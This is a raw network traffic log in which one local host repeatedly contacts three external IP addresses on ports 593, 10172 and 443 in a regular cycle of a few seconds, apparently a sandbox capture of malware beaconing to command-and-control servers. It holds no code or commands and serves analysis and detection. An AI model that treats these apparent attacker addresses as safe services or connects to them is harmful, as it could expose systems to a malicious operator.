Dec 31, 2021 09:53:55.420377016 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:55.425121069 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:55.425244093 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:55.599104881 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:55.599214077 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:55.599373102 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:56.066517115 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:56.066550970 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:56.066647053 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:56.066692114 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:56.068799019 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:56.196047068 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.225671053 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.225939989 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.227271080 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.242758989 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:56.257991076 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.258119106 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.258208990 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.260243893 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.263468981 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.263540983 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.294532061 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.295063972 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.337140083 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.406888008 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.406924009 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.407058001 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.409149885 CET	49916	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:56.438472986 CET	10172	49916	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:56.519386053 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:56.519435883 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:56.519546032 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:56.529536963 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:56.529586077 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.112323999 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.112483025 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.113029003 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.113042116 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.117364883 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.117386103 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.117516994 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.117525101 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.940596104 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.940756083 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.940788984 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.940843105 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:57.940867901 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.940951109 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.943247080 CET	49917	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:57.943329096 CET	443	49917	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:58.048896074 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.253571987 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:58.253874063 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.255084991 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.461626053 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:58.461927891 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:58.462059021 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.462697029 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.466588020 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.466696978 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:58.666913986 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:58.670675039 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:58.671047926 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:59.137753010 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:59.137794018 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:59.137948036 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:59.141518116 CET	49918	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:59.252737999 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.281430960 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.281555891 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.282356977 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.310914040 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.311110020 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.311203957 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.312000990 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.316447020 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.316560030 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.345066071 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.345097065 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.345736027 CET	593	49918	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:59.384790897 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.457300901 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.457329988 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.457603931 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.459511042 CET	49919	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:59.488059044 CET	10172	49919	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:59.564672947 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:59.564749002 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:59.564958096 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:59.565624952 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:59.565660954 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.164679050 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.164856911 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:00.165533066 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:00.165546894 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.169579029 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:00.169593096 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.169692993 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:00.169706106 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.987693071 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.987746000 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:00.988013029 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:00.993745089 CET	49920	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:00.993792057 CET	443	49920	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:01.146955013 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.428642035 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:01.428831100 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.429439068 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.710781097 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:01.711383104 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:01.711471081 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.712060928 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.716140032 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.716233969 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:01.995448112 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:01.999124050 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:01.999351025 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:01.999387026 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:02.467118025 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:02.467159033 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:02.467303038 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:02.467931986 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:02.472218037 CET	49921	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:02.582854033 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.612389088 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.612514019 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.613075018 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.642410040 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.643167019 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.643351078 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.645872116 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.648677111 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.648802042 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.677953959 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.678164959 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.678296089 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.753401995 CET	593	49921	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:02.791244030 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.791268110 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.791399956 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.793890953 CET	49923	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:02.827192068 CET	10172	49923	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:02.909811974 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:02.909882069 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:02.910074949 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:02.910841942 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:02.910860062 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:03.511501074 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:03.511753082 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:03.512619019 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:03.512639046 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:03.516865969 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:03.516906977 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:03.516947031 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:03.516964912 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:04.342776060 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:04.342896938 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:04.343086004 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:04.348741055 CET	49924	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:04.348768950 CET	443	49924	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:04.507642984 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:04.695257902 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:04.695446968 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:04.696271896 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:04.884510040 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:04.885010958 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:04.885118008 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:04.886529922 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:04.892884970 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:04.893035889 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:05.074107885 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.080456018 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.080636978 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.080678940 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.545974016 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.546046019 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.546195030 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:05.548425913 CET	49925	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:05.661286116 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.690390110 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.690656900 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.692105055 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.720834017 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.720921993 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.721057892 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.721890926 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.728444099 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.728573084 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.735851049 CET	593	49925	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:05.757098913 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.757143021 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.757163048 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.868534088 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.868582964 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.868963003 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.874264002 CET	49926	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:05.903179884 CET	10172	49926	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:05.991377115 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:05.991436005 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:05.991585970 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:05.992208004 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:05.992223024 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:06.589112997 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:06.589250088 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:06.591443062 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:06.591478109 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:06.596749067 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:06.596786976 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:06.596940041 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:06.596954107 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:07.433367014 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:07.433485031 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:07.433559895 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:07.433581114 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:07.672280073 CET	49927	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:07.672321081 CET	443	49927	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:07.926039934 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:08.130112886 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:08.130285025 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:08.591382027 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:08.796988964 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:08.797426939 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:08.797534943 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:08.798487902 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:08.801680088 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:08.801759005 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:09.002443075 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.005533934 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.005609035 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.005647898 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.467331886 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.467376947 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.467551947 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:09.470747948 CET	49929	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:09.582062960 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.611222982 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.611354113 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.612112999 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.642179012 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.642358065 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.642472029 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.643112898 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.647461891 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.647582054 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.674618006 CET	593	49929	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:09.677814960 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.677840948 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.716739893 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.789278984 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.789340973 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.789464951 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.792222023 CET	49930	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:09.821078062 CET	10172	49930	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:09.916415930 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:09.916454077 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:09.916708946 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:09.917889118 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:09.917923927 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:10.468420982 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:10.469477892 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:10.469499111 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:10.469515085 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:10.474908113 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:10.474925995 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:10.474950075 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:10.474965096 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:11.274307966 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:11.274380922 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:11.274454117 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:11.274466991 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:11.279745102 CET	49931	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:11.279772997 CET	443	49931	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:11.425061941 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:11.703680992 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:11.703783989 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:11.704615116 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:11.984834909 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:11.985287905 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:11.985372066 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:11.986052036 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:11.990431070 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:11.990605116 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:12.264743090 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:12.269223928 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:12.269339085 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:12.269354105 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:12.734924078 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:12.734987974 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:12.735131979 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:12.741019011 CET	49932	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:12.863991976 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.892956018 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:12.893167973 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.893775940 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.922296047 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:12.922502041 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:12.922581911 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.923160076 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.926112890 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.926204920 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:12.954895973 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:12.954941034 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:12.992691040 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:13.019992113 CET	593	49932	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:13.067028999 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:13.067071915 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:13.067214012 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:13.069644928 CET	49933	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:54:13.100085974 CET	10172	49933	46.101.175.170	192.168.2.7
Dec 31, 2021 09:54:13.192992926 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.193049908 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:13.193181992 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.194331884 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.194360018 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:13.800156116 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:13.800318956 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.801383972 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.801409960 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:13.810931921 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.810962915 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:13.811172009 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:13.811192036 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:14.648237944 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:14.648329973 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:14.648358107 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:14.648389101 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:14.648428917 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:14.648446083 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:14.650616884 CET	49934	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:54:14.650648117 CET	443	49934	103.9.36.172	192.168.2.7
Dec 31, 2021 09:54:14.800043106 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.004513979 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.004715919 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.005990982 CET	49935	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:54:15.210459948 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.210822105 CET	593	49935	103.70.29.126	192.168.2.7
Dec 31, 2021 09:54:15.210947037 CET	49935	593	192.168.2.7	103.70.29.126
